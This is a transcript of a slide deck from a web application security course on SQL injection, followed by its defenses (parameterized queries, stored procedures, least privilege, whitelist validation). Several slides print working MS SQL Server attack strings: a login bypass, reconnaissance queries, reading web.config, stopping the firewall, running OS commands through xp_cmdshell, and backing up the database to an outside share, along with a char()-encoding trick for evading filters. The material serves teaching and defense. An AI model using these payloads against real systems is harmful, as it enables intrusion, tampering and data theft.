21 a1 injection flaws.pptx

30
A1 Injection Flaws Problem and Protection

description

Part of the Web Application Security Course

Transcript of 21 a1 injection flaws.pptx

Page 1: 21 a1 injection flaws.pptx

A1 Injection Flaws

Problem and Protection

Page 2: 21 a1 injection flaws.pptx

Little Bobby Tables

update students set (name) = (' _____ ') where studentID = 33342;

Page 3: 21 a1 injection flaws.pptx

Injection Flaws

o  SQL injections occur when the attacker forces statements into the http request in such a way that his SQL statements are run against the database

Page 4: 21 a1 injection flaws.pptx

How attackers do it

1.  They find a vulnerable site

2.  They type in SQL statements into textboxes, URLs, or inject them into other field forms using a request manipulator like Fiddler

Page 5: 21 a1 injection flaws.pptx

How attackers do it

o  The attackers injection may look like this: 12; update orders set amtDue=0 where orderID=1234; --

o  And the code that runs it might look like this: string sql = "SELECT catID FROM items WHERE prodID = " + txtProdID.Text; var cmd = new SqlCommand(sql, myConn); var categoryID = cmd.ExecuteScalar();

o  So the resulting SQL run would look like this: select catID from items where prodID = 12; update orders set amtDue=0 where orderID=1234;

Page 6: 21 a1 injection flaws.pptx

How to break in without a password

o  Scenario: textboxes for username/password

o  Injection: admin' OR 1=1--

o  Resulting SQL: select userID from user where username = 'admin' OR 1=1 --' and password = '';

Page 7: 21 a1 injection flaws.pptx

How to gather intel about the installation

SQL attack vector Data gathered 0; select @@version; -- Database version

0; select @@servername ; -- Actual server name

0; select @@microsoftversion ; -- OS name and version 0; select * from master..sysservers ; -- List of other servers 0; select * from sysusers ; -- All user accounts

Page 8: 21 a1 injection flaws.pptx

How to get a list of tables

0; SELECT so.name, MAX(si.rows) AS numrows FROM sys.sysobjects AS so INNER JOIN sys.sysindexes AS si ON OBJECT_ID(so.name) = si.id WHERE (so.xtype = 'U') GROUP BY so.name; --

Employees 9 EmployeeTerritories 49 OrderDetails 2155 OrderPayment 1 Orders 830 Products 77 Region 4 Shipment 1 Shippers 3

Page 9: 21 a1 injection flaws.pptx

How to get a table's structure 0; exec sp_columns refundsToProcess; --

Page 10: 21 a1 injection flaws.pptx

How to set a value in a table

0; insert into refundsToProcess (amount, custID, approved) values (932.45, 11234, true); --

Page 11: 21 a1 injection flaws.pptx

How to read files from the hard drives or network

0; create table myfile (line varchar(8000)); bulk insert myfile from 'c:\inetpub\wwwroot\web.config'; select * from myfile; --

Page 12: 21 a1 injection flaws.pptx

How to start and stop OS Services 0; EXEC xp_servicecontrol stop Firewall; -- 0; EXEC xp_servicecontrol start telnet; --

Page 13: 21 a1 injection flaws.pptx

How to run OS commands

0; exec master..xp_cmdshell 'reg.exe ADD HKLM\Software\HackersAreUs /v NoAuth /t REG_BINARY /d 0001 '; --

Page 14: 21 a1 injection flaws.pptx

How to steal the whole doggone database!

0; backup database master to disks='\\{IP}\{sharename}\backupdb.dat'; --

Page 15: 21 a1 injection flaws.pptx

How to vacation offshore after pwning

us

Page 16: 21 a1 injection flaws.pptx

How we protect ourselves

o  Use parameterized statements o  Use stored procedures o  Enforce least privilege o  Validate the input via whitelist

Page 17: 21 a1 injection flaws.pptx

Use parameterized statements

o  Single best thing to do o  All other methods can help o  Only this one will halt the attack by itself o  It's the parameters that fix the issue

Page 18: 21 a1 injection flaws.pptx

Use parameterized queries var cmd = new SqlCommand("select count(*) from users where userID = @userID and pwd = @pwd", myConn); cmd.Parameters.Add( new SqlParameter("@userID",SqlDbType.NVarChar,10)); cmd.Parameters["@userID"].Value = txtUserID.Text; cmd.Parameters.Add( new SqlParameter("@pwd",SqlDbType.NVarChar,128)); cmd.Parameters["@pwd"].Value = txtPassword.Text; if (Convert.ToInt16(cmd.ExecuteScalar()) == 0) throw new Exception("No dice, chief.");

Page 19: 21 a1 injection flaws.pptx

ORMs and injection attacks

o  ORMs like •  NHibernate •  LINQ •  Entity Framework

o  Uses parameterized queries natively

o  So use an ORM and you're all set!

Page 20: 21 a1 injection flaws.pptx

Use stored procedures o  Stored procedures make it tougher for attackers to inject

sql because procedures are by definition limited to certain activities

CREATE procedure OrderItem( @CustomerID nchar(5), @ProductID int, @Quantity int, @OrderID int OUT ) as declare @UnitPrice money --First, get Unit Price for the Item sold set @UnitPrice = (select UnitPrice from Products where ProductID = @ProductID); --Create the order header and get the orderID insert into Orders ( CustomerID, OrderDate, RequiredDate, ShipVia) values (@CustomerID, getdate(), DateAdd(Day, 7, getdate()), 3); set @OrderID = @@IDENTITY; --Add Order Detail Row insert into [Order Details] ( OrderID, ProductID, UnitPrice, Quantity) values (@OrderID, @ProductID, @UnitPrice, @Quantity); go

Page 21: 21 a1 injection flaws.pptx

Stored procedures can be vulnerable

o  Example: alter procedure DoGenericQuery @query nvarchar(255) as exec sp_executesql @query go

o  This would run ANY other query o  Stay vigilant with procedures

Page 22: 21 a1 injection flaws.pptx

Enforce least privilege

o  For all RDBMS activities, use DB users vs. Windows users

o  For that DB user, remove all privileges (read, write, modify, grant, deny) on every entity (table, view, procedure, function) until it can be proven that the user needs that privilege

o  Basically whitelist instead blacklist privileges o  If this user needs to read X columns from a

table, create a view with only those X columns. Grant privilege on that view and deny it on the table

Page 23: 21 a1 injection flaws.pptx

Validate data via a whitelist

o  Test the data being input to make sure that it matches a pattern

o  If it doesn't match a pattern, we reject it via a graceful error message

o  Pattern = RegEx (___________ _________)

Page 24: 21 a1 injection flaws.pptx

Why not a blacklist?

o  You cannot possibly predict all of the possible ways that an attacker will get around our filter

o  As in most things in life, where there are only a couple of ways to get something right, there are a near infinite number of ways to do it wrong

Page 25: 21 a1 injection flaws.pptx

Why not a blacklist?

o  Example: o  You blacklist single quotes and semicolons o  Attacker simply types in ... pass concat(char(39), char(32), char(111), char(114), char(32), char(49), char(61), char(49))

o  which is ... pass' or 1=1

Page 26: 21 a1 injection flaws.pptx

How to whitelist

o  Specify only the patterns that you will allow Description Regular Expression Safe text. Letters, numbers, whitespace, dots, & dashes only.

^[a-zA-Z0-9\s.\-]+$

Social Security number ^\d{3}-\d{2}-\d{4}$ One of the 50 states ^(AL|AK|AZ|AR|CA|CO|...|TX|UT|VA|

WA|WV|WI|WY)$

US telephone number ^\D?(\d{3})\D?\D?(\d{3})\D?(\d{4})$

Credit card number ^((4\d{3})|(5[1-5]\d{2})|(6011)|(7\d{3}))-?\d{4}-?\d{4}-?\d{4}|3[4,7]\d{13}$

Page 27: 21 a1 injection flaws.pptx

How to whitelist

string whitelist = @"^\d{3}-\d{2}-\d{4}$"; if (! new Regex(whitelist).IsMatch(txtSSN.Text)) throw new Exception("Quit that hacking!");

o  Note the @-sign. Needed because ______

Page 28: 21 a1 injection flaws.pptx

Summary

o  If the opportunity to inject SQL into our pages is present, attackers can inflict extremely serious and irreparable harm to our organization

o  This is the top-rated web vulnerability known to man

o  It can be mitigated by: •  Whitelisting user input •  Using stored procedures •  Enforcing least privilege •  Using parameterized statements

Page 29: 21 a1 injection flaws.pptx

p.s. Not just SQL Injections

o  Injection attack vectors include: •  OS commands •  HTML injections •  LDAP injections •  XML/XPath/XSLT

o  The solutions are the same as for SQL, though

Page 30: 21 a1 injection flaws.pptx

Further study

o  Pocket guide to web security: •  http://amzn.to/PocketGuideWebSecurity

o  Very thorough reference on injection attacks: o  http://bit.ly/InjectionAttackReference

o  Tricks on overcoming blacklist filters: o  http://bit.ly/OvercomingBlacklists

o  List of SQL injection attack vectors: o  http://bit.ly/SQLInjectionCheatSheet